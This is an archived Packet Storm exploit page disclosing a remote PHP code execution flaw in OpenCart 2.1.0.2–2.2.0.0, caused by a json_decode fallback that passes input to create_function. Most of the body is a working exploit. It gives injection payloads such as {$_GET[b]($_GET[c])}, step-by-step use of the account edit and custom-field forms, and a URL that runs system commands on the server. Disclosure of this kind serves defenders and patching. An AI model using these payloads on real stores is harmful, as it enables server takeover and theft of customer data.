Twenty Year Anniversary

OpenCart 2.2.0.0 Remote PHP Code Execution

OpenCart 2.2.0.0 Remote PHP Code Execution
Posted Apr 11, 2016
Authored by Naser Farhadi

OpenCart version 2.2.0.0 suffers from a remote PHP code execution vulnerability.

tags | exploit, remote, php, code execution
MD5 | a0c62bd7f4f788bdad258431ef305892

OpenCart 2.2.0.0 Remote PHP Code Execution

Change Mirror Download
##
# OpenCart json_decode function Remote PHP Code Execution
#
# Author: Naser Farhadi
# Twitter: @naserfarhadi
#
# Date: 9 April 2016 # Version: 2.1.0.2 to 2.2.0.0 (Latest version)
# Vendor Homepage: http://www.opencart.com/
#
# Vulnerability:
# ------------
# /upload/system/helper/json.php
# $match = '/".*?(?<!\\\\)"/';
# $string = preg_replace($match, '', $json);
# $string = preg_replace('/[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/', '', $string);
# ...
# $function = @create_function('', "return {$json};"); /**** The Root of All Evil ****/
# $return = ($function) ? $function() : null;
# ...
# return $return;
#
# Exploit(json_decode):
# ------------
# var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}'));
# var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}'));
# var_dump(json_decode('{"ok":"1"."2"."3"}'));
#
# Real World Exploit(OpenCart /index.php?route=account/edit)
# ------------
# go to http://host/shop_directory/index.php?route=account/edit
# fill $_SERVER[HTTP_USER_AGENT] as First Name
# /** save it two times **/
# Code execution happens when an admin user visits the administration panel, in this example
# admin user sees his user agent as your First Name in Recent Activity :D
#
# Another example(OpenCart account/edit or account/register custom_field): /** Best Case **/
# ------------
# if admin adds a Custom Field from /admin/index.php?route=customer/custom_field for custom
# user information like extra phone number,... you can directly execute your injected code.
# go to http://host/shop_directory/index.php?route=account/edit
# fill {$_GET[b]($_GET[c])} as Custom Field value
# save it
# go to http://host/shop_directory/index.php?route=account/edit&b=system&c=ls /** Mission Accomplished **/
#
# Note:
# ------------
# Exploit only works if PHP JSON extension is not installed.
#
# Video: https://youtu.be/1Ai09IQK4C0
##

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

June 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    14 Files
  • 2
    Jun 2nd
    1 Files
  • 3
    Jun 3rd
    3 Files
  • 4
    Jun 4th
    18 Files
  • 5
    Jun 5th
    21 Files
  • 6
    Jun 6th
    9 Files
  • 7
    Jun 7th
    16 Files
  • 8
    Jun 8th
    18 Files
  • 9
    Jun 9th
    5 Files
  • 10
    Jun 10th
    2 Files
  • 11
    Jun 11th
    21 Files
  • 12
    Jun 12th
    34 Files
  • 13
    Jun 13th
    15 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    4 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    2 Files
  • 18
    Jun 18th
    13 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close